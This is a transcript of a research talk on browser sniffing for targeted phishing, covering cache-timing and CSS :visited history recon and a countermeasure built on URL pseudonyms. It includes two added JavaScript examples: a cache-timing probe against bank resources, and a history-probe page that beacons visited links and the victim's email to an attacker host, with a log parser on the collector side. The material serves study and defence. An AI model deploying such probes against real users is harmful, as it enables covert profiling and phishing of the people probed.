1 Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm

2 The Scenario
Grandma goes to an evil site
Gets sniffed
Gets a phishing email
Loses money

3 Summary
Example phishing attacks
Context-aware phishing attacks
Browser-recon attack
Other solutions
Our solution


6 Context Aware Attacks
Data about targets is obtained
Used to customize emails
Yields a higher vulnerability rate

7 Context: Social Networks
Mine site for relationships (Alice knows Bob)
Spoof email from victim's friend
People trust their friends (and that which spoofs them)

8 Context: Browser-Recon
Phisher mines browsers:
–Browsing history
–Cached data
Attacker can discover affiliations
Easy to pair browser history with email address

9 Context: Cache Recon (pic1.jpg is not cached)
GET /index.html
GET /pics/pic1.jpg
GET /pics/pic2.jpg
…
pic1.jpg is not in the cache, so the browser requests it

10 Context: Cache Recon (pic1.jpg is cached)
GET /index.html
…
pic1.jpg is in the cache, so no request for it is sent

11 Context: Cache Recon
Phishing page forces 3 sequential loads:
–Img1 on phisher's server
–Img2 on site in question (e.g. Bank)
–Img3 on phisher's server
Load Time ~ Time(Img3) - Time(Img1)
Short load time = cache hit
(Felten & Schneider, "Timing Attacks on Web Privacy", 7th ACM Conference on Computer and Communications Security, 2000.)

12 Context: Cache Recon
GET pic1.jpg
GET pic2.jpg
GET logout.jpg
(Felten & Schneider, 2000, as above)
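The three-load timing probe of slides 11 and 12, as an added example that is not code from the slides or from the authors. The phisher host, the bank image URLs and the latency numbers are assumptions; the "browser" is a constructed offline model so the probe can be run and checked without a network, and an in-browser variant using `Image` and `performance.now()` is included for the real thing.

```javascript
'use strict';

// Cache-timing recon in the shape of slides 9-12 (Felten & Schneider, 2000):
// three sequential image loads with the target resource in the middle.
//   Time(Img3 done) - Time(Img1 done) ~ Time(Img2) + Time(Img3)
// The phisher controls Img1 and Img3, so it knows roughly what Img3 costs;
// what is left is the cost of Img2, and a tiny cost means a cache hit.

const PHISHER = 'https://phisher.example';            // assumption: attacker host
const BANK_PICS = [                                    // assumption: resources probed
  'https://bank.example/pics/pic1.jpg',
  'https://bank.example/pics/pic2.jpg',
  'https://bank.example/pics/logout.jpg',
];

// Decision rule: subtract the known phisher round trip, compare to a threshold.
function inferCached(t1Done, t3Done, phisherMs, thresholdMs) {
  const targetMs = (t3Done - t1Done) - phisherMs;
  return { targetMs, cached: targetMs < thresholdMs };
}

// Constructed offline model of a browser cache: a Set of cached URLs, a
// simulated clock, and a fixed latency for a cache hit vs. a network fetch.
function makeSimulatedBrowser(cachedUrls, { cacheMs = 2, networkMs = 120 } = {}) {
  const cache = new Set(cachedUrls);
  let clock = 0;
  return {
    now: () => clock,
    load(url) {
      clock += cache.has(url) ? cacheMs : networkMs;
      cache.add(url);              // a real browser caches what it just fetched
      return clock;                // completion time of this load
    },
  };
}

// One probe: Img1 (phisher) -> Img2 (target) -> Img3 (phisher). The query
// string on the phisher images is a cache-buster so they are never cached.
function simulateProbe(browser, targetUrl, { networkMs = 120, thresholdMs = 30 } = {}) {
  const nonce = browser.now();
  const t1 = browser.load(`${PHISHER}/img1.gif?${nonce}`);
  browser.load(targetUrl);
  const t3 = browser.load(`${PHISHER}/img3.gif?${nonce}`);
  return inferCached(t1, t3, networkMs, thresholdMs).cached;
}

// Slide 12: probe a list of bank resources and report the ones found cached.
function probeMany(cachedUrls, targets, opts) {
  const browser = makeSimulatedBrowser(cachedUrls, opts);
  return targets.filter((url) => simulateProbe(browser, url, opts));
}

// In-browser version of the same probe (not runnable under Node): loads the
// three images with <img> and timestamps them with performance.now().
// onerror is handled like onload so a blocked or missing resource still
// yields a timing.
async function probeInBrowser(targetUrl, { phisherMs = 120, thresholdMs = 30 } = {}) {
  const loadImage = (url) => new Promise((resolve) => {
    const img = new Image();
    img.onload = img.onerror = () => resolve(performance.now());
    img.src = url;
  });
  const nonce = Date.now();
  const t1 = await loadImage(`${PHISHER}/img1.gif?${nonce}`);
  await loadImage(targetUrl);
  const t3 = await loadImage(`${PHISHER}/img3.gif?${nonce}`);
  return inferCached(t1, t3, phisherMs, thresholdMs);
}

// Offline run: only pic1.jpg is in the constructed cache, so only it is reported.
console.log(probeMany([BANK_PICS[0]], BANK_PICS));
```

The threshold has to sit between a cache hit and the slowest expected network fetch, so in practice the phisher calibrates it from Img1 and Img3 rather than hard-coding it. Note that current browsers partition the HTTP cache by top-level site, which removes the cross-site signal this 2006-era probe relies on.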

13 Context: History Recon
The Code:
    a { color: blue; }
    #id1:visited { color: red; }
    #id2:visited { color: red; }
    #id3:visited { color: red; }
Links on the page: Link 1, Link 2, Link 3
What You See: Link 1, Link 2, Link 3 (visited links render red, unvisited blue)

14 Context: History Recon
The Code:
    a { color: blue; }
    #id1:visited { background: url('e.com/?id=1'); }
    #id2:visited { background: url('e.com/?id=2'); }
    …
Links on the page: Link 1, Link 2, Link 3
What You See: Link 1, Link 3, and Link 2 rendered differently (its :visited rule applies, so the browser fetches e.com/?id=2 as the background image and e.com learns Link 2 was visited)

15 Context: History Recon
The Code:
    a { color: blue; }
    #id1:visited { background: url('e.com/?id=1'); }
    #id2:visited { background: url('e.com/?id=2'); }
    …
What You See: nothing visible changes, but each visited link causes a request to e.com

16 History Recon + Email
GET /?IAM=alice@x.com (page with lots of links)
GET /hit?id=1&IAM=alice@x.com
GET /hit?id=42&IAM=alice@x.com
Phisher can now associate Alice with link 1 and 42
Auto-Fill Identity Extraction
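The history-recon probe of slides 13 to 16, both halves, as an added example (not code from the slides or from the authors): the generator for the probe page whose `:visited` rules carry beacon URLs, and the collector-side parser that turns `GET /hit?id=…&IAM=…` requests into an email-to-visited-links map. The beacon host, the probed sites and the sample log lines are constructed assumptions.

```javascript
'use strict';

// History recon as on slides 13-16: a probe page whose :visited rules carry a
// background-image URL, so each visited link makes the browser fetch a beacon
// from the phisher. The beacon URL also carries the identity (IAM=...) that
// came in with the emailed link, so hits are tied to an email address.

const BEACON = 'https://e.com/hit';           // assumption: phisher's collector
const LINKS = [                                // assumption: sites worth probing
  { id: 1,  href: 'https://bank.example/login' },
  { id: 2,  href: 'https://broker.example/' },
  { id: 42, href: 'https://otherbank.example/online' },
];

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Builds the CSS + HTML of the probe page for one recipient (slides 14-16).
// The identity is URL-encoded so an address never breaks the query string.
function buildProbePage(links, identity) {
  const iam = encodeURIComponent(identity);
  const css = ['a { color: blue; }']
    .concat(links.map((l) =>
      `#id${l.id}:visited { background: url('${BEACON}?id=${l.id}&IAM=${iam}'); }`))
    .join('\n');
  const anchors = links
    .map((l) => `<a id="id${l.id}" href="${escapeHtml(l.href)}">Link ${l.id}</a>`)
    .join('\n');
  return `<style>\n${css}\n</style>\n${anchors}\n`;
}

// Collector side: parse request lines such as
//   GET /hit?id=42&IAM=alice@x.com
// into a Map from email address to the sorted list of visited link ids.
// Lines that are not beacon hits (the initial page load, favicons) are skipped.
function parseHitLog(lines) {
  const hits = new Map();
  for (const line of lines) {
    const m = /^GET \/hit\?([^ ]*)/.exec(line.trim());
    if (!m) continue;
    const q = new URLSearchParams(m[1]);
    const id = Number(q.get('id'));
    const iam = q.get('IAM');
    if (!Number.isInteger(id) || !iam) continue;
    if (!hits.has(iam)) hits.set(iam, new Set());
    hits.get(iam).add(id);
  }
  return new Map([...hits].map(([iam, ids]) => [iam, [...ids].sort((a, b) => a - b)]));
}

// Constructed sample log: the requests shown on slide 16 plus unrelated noise.
const SAMPLE_LOG = [
  'GET /?IAM=alice@x.com',
  'GET /hit?id=1&IAM=alice@x.com',
  'GET /hit?id=42&IAM=alice@x.com',
  'GET /hit?id=2&IAM=bob@y.org',
  'GET /favicon.ico',
];

console.log(buildProbePage(LINKS, 'alice@x.com'));
console.log(parseHitLog(SAMPLE_LOG));   // alice@x.com -> [1, 42], bob@y.org -> [2]
```

This is the 2006 behaviour the slides describe. Browsers closed it around 2010 (Firefox 4, Chrome 9) by refusing to load resources, including background images, from `:visited` rules and by lying about visited state in `getComputedStyle`, which is the "CSS limiting" client-side fix mentioned on slide 18.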

17 “Chameleon” Attack

18 Solutions to Browser-recon
Client-Side Solutions:
–Jackson, Bortz, Boneh, Mitchell, "Protecting browser state from web privacy attacks", WWW 2006.
–CSS limiting
–"User-Paranoia" (regularly clear history and cache, keep no bookmarks)
Server-Side Solution:
–Make URLs impossible to guess

19 Solution Goals
Requirements:
1. Hard to guess any pages or resources served by the SP (service provider)
2. Search engines can still index and search the SP

20 Formal Goal Specification


22 Solution Techniques
Two techniques:
1. Customize URLs with pseudonyms, e.g. http://chase.com/page.html?39fc938f
2. Pollute client state (fill cache/history with related sites not visited by the client)
Hiding vs. obfuscating:
–Internal (protected) URLs are hidden
–Entry point (public) URLs are obfuscated

23 Solution to Browser-recon
(Diagram: client C sends GET / directly to server S)

24 Solution to Browser-recon
(Diagram: translator S_T placed in front of server S_B, both within the domain of S; the client's pseudonymized request GET /?13fc021b is mapped by S_T to a plain GET / at S_B)

25 Pseudonyms
Establishing a pseudonym
Using a pseudonym
Pseudonym validity check:
–Via cookies
–Via the HTTP Referer header
–Via message authentication codes

26 Pseudonyms
Robot policies:
–Dealing with search engines
–robots.txt "standard" (no problem if a robot cheats)
Pollution policy:
–Pollute entrance URLs
–How to choose pollutants?
What about links to offsite data? Bookmarks?

27 Example
(Diagram: client C at 10.0.0.1 and Bank.com; the client's GET /page.html?83fa029 corresponds to a plain GET /page.html at the server)

28–31 Example
(Diagram sequence: client C at 10.0.0.1 browsing Bank.com; the page offers "Go to G" and "Log in"; figures only)

32 Example
(Diagram: as above, with the translator T added)

33 Client’s Perception

34 Policies
Offsite redirection policy
Data replacement policy
Client vs. robot distinction

35 Special Cases
Cache pollution reciprocity
Shared/transfer pseudonyms

36 Security Argument
Perfect privacy of internal pages
N-privacy of entrance pages
Searchability

37 Prototype Details
Java app simulating an HTTP server
Pseudonyms: 64-bit random number
–java.security.SecureRandom
Experimental client:
–Shell script + cURL
(Diagram: S_B and S_T)

38 Experimental Results


42 General Considerations
Forwarding the User-Agent
Translating cookies
Optimizations

43 Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm ?

